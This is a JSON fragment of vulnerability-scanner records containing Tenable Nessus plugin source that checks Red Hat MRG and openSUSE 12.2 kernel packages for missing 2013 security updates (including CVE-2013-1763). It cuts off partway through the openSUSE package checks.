value:\"p-cpe:/a:redhat:enterprise_linux:mrg-rt-release\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/02/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/03/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/07/22\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\ninclude(\"ksplice.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 6.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2012-4542\", \"CVE-2013-0268\", \"CVE-2013-0290\", \"CVE-2013-0871\", \"CVE-2013-1763\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for RHSA-2013:0622\");\n }\n else\n {\n __rpm_report = ksplice_reporting_text();\n }\n}\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2013:0622\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n\n if (! (rpm_exists(release:\"RHEL6\", rpm:\"mrg-release\"))) audit(AUDIT_PACKAGE_NOT_INSTALLED, \"MRG\");\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"kernel-rt-3.6.11-rt30.25.el6rt\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"kernel-rt-debug-3.6.11-rt30.25.el6rt\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"kernel-rt-debug-debuginfo-3.6.11-rt30.25.el6rt\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"kernel-rt-debug-devel-3.6.11-rt30.25.el6rt\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"kernel-rt-debuginfo-3.6.11-rt30.25.el6rt\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"kernel-rt-debuginfo-common-x86_64-3.6.11-rt30.25.el6rt\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"kernel-rt-devel-3.6.11-rt30.25.el6rt\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"kernel-rt-doc-3.6.11-rt30.25.el6rt\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"kernel-rt-firmware-3.6.11-rt30.25.el6rt\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"kernel-rt-trace-3.6.11-rt30.25.el6rt\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"kernel-rt-trace-debuginfo-3.6.11-rt30.25.el6rt\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"kernel-rt-trace-devel-3.6.11-rt30.25.el6rt\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"kernel-rt-vanilla-3.6.11-rt30.25.el6rt\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"kernel-rt-vanilla-debuginfo-3.6.11-rt30.25.el6rt\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"kernel-rt-vanilla-devel-3.6.11-rt30.25.el6rt\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"mrg-rt-release-3.6.11-rt30.25.el6rt\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel-rt / kernel-rt-debug / kernel-rt-debug-debuginfo / etc\");\n }\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-20T12:26:16", "description": "The Linux kernel was updated to 3.4.33 and to fix a local root\nprivilege escalation and various other security and non-security bugs.\n\nCVE-2013-1763: A out of bounds access in sock_diag could be used by\nlocal attackers to execute code in kernel context and so become root.\n\nCVE-2013-0160: The atime of /dev/ptmx is no longer updated, avoiding\nside channel attacks via user typing speed.\n\nCVE-2012-5374: Denial of service via btrfs hashes could have been used\nby local attackers to cause a compute denial of service.\n\nCVE-2013-0216: Fixed a problem in XEN netback: shutdown the ring if it\ncontains garbage.\n\nCVE-2013-0231: Fixed a problem in XEN pciback: rate limit error\nmessages from xen_pcibk_enable_msi(x).", "edition": 18, "published": "2014-06-13T00:00:00", "title": "openSUSE Security Update : kernel (openSUSE-SU-2013:0395-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-0160", "CVE-2013-1763", "CVE-2013-0231", "CVE-2013-0216", "CVE-2012-5374"], "modified": "2014-06-13T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:kernel-source", "p-cpe:/a:novell:opensuse:kernel-source-vanilla", "p-cpe:/a:novell:opensuse:kernel-vanilla-debugsource", "p-cpe:/a:novell:opensuse:kernel-debug-debuginfo", "p-cpe:/a:novell:opensuse:kernel-vanilla-debuginfo", "p-cpe:/a:novell:opensuse:kernel-ec2-devel-debuginfo", "p-cpe:/a:novell:opensuse:kernel-pae-debuginfo", "p-cpe:/a:novell:opensuse:kernel-default-debugsource", "p-cpe:/a:novell:opensuse:kernel-vanilla-devel-debuginfo", "p-cpe:/a:novell:opensuse:kernel-trace", "p-cpe:/a:novell:opensuse:kernel-ec2-base", "p-cpe:/a:novell:opensuse:kernel-ec2", "p-cpe:/a:novell:opensuse:kernel-trace-devel-debuginfo", "p-cpe:/a:novell:opensuse:kernel-pae-debugsource", "p-cpe:/a:novell:opensuse:kernel-xen-devel", "p-cpe:/a:novell:opensuse:kernel-trace-base", "p-cpe:/a:novell:opensuse:kernel-default-debuginfo", "p-cpe:/a:novell:opensuse:kernel-ec2-debuginfo", "p-cpe:/a:novell:opensuse:kernel-desktop-debuginfo", "p-cpe:/a:novell:opensuse:kernel-ec2-base-debuginfo", "p-cpe:/a:novell:opensuse:kernel-xen-base-debuginfo", "p-cpe:/a:novell:opensuse:kernel-desktop-base-debuginfo", "p-cpe:/a:novell:opensuse:kernel-desktop-base", "p-cpe:/a:novell:opensuse:kernel-debug-devel-debuginfo", "p-cpe:/a:novell:opensuse:kernel-xen-base", "p-cpe:/a:novell:opensuse:kernel-default-devel", "p-cpe:/a:novell:opensuse:kernel-devel", "p-cpe:/a:novell:opensuse:kernel-ec2-debugsource", "p-cpe:/a:novell:opensuse:kernel-pae", "p-cpe:/a:novell:opensuse:kernel-ec2-extra-debuginfo", "p-cpe:/a:novell:opensuse:kernel-pae-devel", "p-cpe:/a:novell:opensuse:kernel-syms", "p-cpe:/a:novell:opensuse:kernel-pae-base-debuginfo", "p-cpe:/a:novell:opensuse:kernel-pae-base", "p-cpe:/a:novell:opensuse:kernel-vanilla", "p-cpe:/a:novell:opensuse:kernel-xen", "p-cpe:/a:novell:opensuse:kernel-vanilla-devel", "p-cpe:/a:novell:opensuse:kernel-debug-base", "p-cpe:/a:novell:opensuse:kernel-xen-debugsource", "p-cpe:/a:novell:opensuse:kernel-trace-devel", "p-cpe:/a:novell:opensuse:kernel-trace-debuginfo", "p-cpe:/a:novell:opensuse:kernel-debug-debugsource", "p-cpe:/a:novell:opensuse:kernel-desktop-devel-debuginfo", "p-cpe:/a:novell:opensuse:kernel-default", "p-cpe:/a:novell:opensuse:kernel-ec2-devel", "p-cpe:/a:novell:opensuse:kernel-ec2-extra", "p-cpe:/a:novell:opensuse:kernel-trace-base-debuginfo", "p-cpe:/a:novell:opensuse:kernel-pae-devel-debuginfo", "p-cpe:/a:novell:opensuse:kernel-debug-devel", "p-cpe:/a:novell:opensuse:kernel-desktop-devel", "p-cpe:/a:novell:opensuse:kernel-xen-devel-debuginfo", "p-cpe:/a:novell:opensuse:kernel-xen-debuginfo", "p-cpe:/a:novell:opensuse:kernel-debug-base-debuginfo", "p-cpe:/a:novell:opensuse:kernel-desktop", "p-cpe:/a:novell:opensuse:kernel-debug", "p-cpe:/a:novell:opensuse:kernel-trace-debugsource", "p-cpe:/a:novell:opensuse:kernel-default-base", "cpe:/o:novell:opensuse:12.2", "p-cpe:/a:novell:opensuse:kernel-default-base-debuginfo", "p-cpe:/a:novell:opensuse:kernel-desktop-debugsource", "p-cpe:/a:novell:opensuse:kernel-default-devel-debuginfo"], "id": "OPENSUSE-2013-175.NASL", "href": "https://www.tenable.com/plugins/nessus/74913", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2013-175.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(74913);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2012-5374\", \"CVE-2013-0160\", \"CVE-2013-0216\", \"CVE-2013-0231\", \"CVE-2013-1763\");\n\n script_name(english:\"openSUSE Security Update : kernel (openSUSE-SU-2013:0395-1)\");\n script_summary(english:\"Check for the openSUSE-2013-175 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The Linux kernel was updated to 3.4.33 and to fix a local root\nprivilege escalation and various other security and non-security bugs.\n\nCVE-2013-1763: A out of bounds access in sock_diag could be used by\nlocal attackers to execute code in kernel context and so become root.\n\nCVE-2013-0160: The atime of /dev/ptmx is no longer updated, avoiding\nside channel attacks via user typing speed.\n\nCVE-2012-5374: Denial of service via btrfs hashes could have been used\nby local attackers to cause a compute denial of service.\n\nCVE-2013-0216: Fixed a problem in XEN netback: shutdown the ring if it\ncontains garbage.\n\nCVE-2013-0231: Fixed a problem in XEN pciback: rate limit error\nmessages from xen_pcibk_enable_msi(x).\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=797175\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=799209\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=800280\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=801178\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=801782\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=802153\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=804738\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=805633\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.opensuse.org/opensuse-updates/2013-03/msg00012.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected kernel packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-debug-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-debug-base-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-debug-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-debug-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-debug-devel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-default-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-default-base-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-default-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-default-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-default-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-default-devel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-desktop\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-desktop-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-desktop-base-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-desktop-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-desktop-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-desktop-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-desktop-devel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-ec2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-ec2-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-ec2-base-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-ec2-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-ec2-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-ec2-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-ec2-devel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-ec2-extra\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-ec2-extra-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-pae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-pae-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-pae-base-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-pae-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-pae-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-pae-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-pae-devel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-source\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-source-vanilla\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-syms\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-trace\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-trace-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-trace-base-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-trace-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-trace-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-trace-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-trace-devel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-vanilla\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-vanilla-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-vanilla-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-vanilla-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-vanilla-devel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-xen-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-xen-base-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-xen-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-xen-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-xen-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-xen-devel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:12.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/02/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE12\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"12.2\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE12.2\", reference:\"kernel-default-3.4.33-2.24.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", reference:\"kernel-default-base-3.4.33-2.24.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", reference:\"kernel-default-base-debuginfo-3.4.33-2.24.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", reference:\"kernel-default-debuginfo-3.4.33-2.24.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", reference:\"kernel-default-debugsource-3.4.33-2.24.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", reference:\"kernel-default-devel-3.4.33-2.24.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", reference:\"kernel-default-devel-debuginfo-3.4.33-2.24.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", reference:\"kernel-devel-3.4.33-2.24.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", reference:\"kernel-source-3.4.33-2.24.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", reference:\"kernel-source-vanilla-3.4.33-2.24.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", reference:\"kernel-syms-3.4.33-2.24.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"i686\", reference:\"kernel-debug-3.4.33-2.24.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"i686\", reference:\"kernel-debug-base-3.4.33-2.24.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"i686\", reference:\"kernel-debug-base-debuginfo-3.4.33-2.24.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"i686\", reference:\"kernel-debug-debuginfo-3.4.33-2.24.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"i686\", reference:\"kernel-debug-debugsource-3.4.33-2.24.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"i686\", reference:\"kernel-debug-devel-3.4.33-2.24.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"i686\", reference:\"kernel-debug-devel-debuginfo-3.4.33-2.24.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"i686\", reference:\"kernel-desktop-3.4.33-2.24.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"i686\", reference:\"kernel-desktop-base-3.4.33-2.24.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"i686\", reference:\"kernel-desktop-base-debuginfo-3.4.33-2.24.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"i686\", reference:\"kernel-desktop-debuginfo-3.4.33-2.24.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"i686\", reference:\"kernel-desktop-debugsource-3.4.33-2.24.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"i686\", reference:\"kernel-desktop-devel-3.4.33-2.24.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"i686\", reference:\"kernel-desktop-devel-debuginfo-3.4.33-2.24.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"i686\", reference:\"kernel-ec2-3.4.33-2.24.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"i686\", reference:\"kernel-ec2-base-3.4.33-2.24.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"i686\", reference:\"kernel-ec2-base-debuginfo-3.4.33-2.24.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"i686\", reference:\"kernel-ec2-debuginfo-3.4.33-2.24.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"i686\", reference:\"kernel-ec2-debugsource-3.4.33-2.24.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"i686\", reference:\"kernel-ec2-devel-3.4.33-2.24.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"i686\", reference:\"kernel-ec2-devel-debuginfo-3.4.33-2.24.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"i686\", reference:\"kernel-ec2-extra-3.4.33-2.24.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"i686\", reference:\"kernel-ec2-extra-debuginfo-3.4.33-2.24.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"i686\", reference:\"kernel-pae-3.4.33-2.24.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"i686\", reference:\"kernel-pae-base-3.4.33-2.24.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"i686\", reference:\"kernel-pae-base-debuginfo-3.4.33-2.24.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"i686\", reference:\"kernel-pae-debuginfo-3.4.33-2.24.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"i686\", reference:\"kernel-pae-debugsource-3.4.33-2.24.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"i686\", reference:\"kernel-pae-devel-3.4.33-2.24.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"i686\", reference:\"kernel-pae-devel-debuginfo-3.4.33-2.24.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"i686\", reference:\"kernel-trace-3.4.33-2.24.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"i686\", reference:\"kernel-trace-base-3.4.33-2.24.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"i686\", reference:\"kernel-trace-base-debuginfo-3.4.33-2.24.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"i686\", reference:\"kernel-trace-debuginfo-3.4.33-2.24.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"i686\", reference:\"kernel-trace-debugsource-3.4.33-2.24.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"i686\", reference:\"kernel-trace-devel-3.4.33-2.24.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"i686\", reference:\"kernel-trace-devel-debuginfo-3.4.33-2.24.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"i686\", reference:\"kernel-vanilla-3.4.33-2.24.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"i686\", reference:\"kernel-vanilla-debuginfo-3.4.33-2.24.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"i686\", reference:\"kernel-vanilla-debugsource-3.4.33-2.24.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"i686\", reference:\"kernel-vanilla-devel-3.4.33-2.24.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"i686\", reference:\"kernel-vanilla-devel-debuginfo-3.4.33-2.24.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"i686\", reference:\"kernel-xen-3.4.33-2.24.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"i686\", reference:\"kernel-xen-base-3.4.33-2.24.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"i686\", reference:\"kernel-xen-base-debuginfo-3.4.33-2.24.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"i686\", reference:\"kernel-xen-debuginfo-3.4.33-2.24.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"i686\", 